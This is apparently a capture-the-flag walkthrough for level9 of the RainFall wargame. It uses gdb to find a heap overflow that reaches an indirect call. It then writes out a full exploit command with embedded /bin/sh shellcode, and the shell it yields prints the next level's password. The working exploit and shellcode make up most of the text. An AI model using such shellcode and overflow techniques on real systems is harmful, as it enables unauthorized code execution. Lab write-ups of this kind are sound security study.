1.6 KiB
1.6 KiB
For the last level of the mandatory part, we notice there is a twist, as the binary seems to be a cpp code. We don't seem to see any shell or pass reading so we are going to use a shellcode.
Let's try to make the program segfault with 'A's it segfault from 109, if we put 112 in gdb with 'B's at the end, we get this segfault
(gdb) i r
eax 0x42424242 1111638594
ecx 0x42424242 1111638594
edx 0x804a07c 134520956
ebx 0x804a078 134520952
esp 0xbffff6a0 0xbffff6a0
ebp 0xbffff6c8 0xbffff6c8
esi 0x0 0
edi 0x0 0
eip 0x8048682 0x8048682 <main+142>
eflags 0x210287 [ CF PF SF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/i $eip
=> 0x8048682 <main+142>: mov (%eax),%edx
(gdb)
later in the code, we got this
0x8048693 <main+159> call *%edx
That means we can put the target address we want to jump to at any point in the string, and put the adress of this at the 109-112 bytes.
We will target our shellcode with it.
level9@RainFall:~$ ./level9 `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"`
$ whoami
bonus0
$ cat /home/user/bonus0/.pass
f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
:)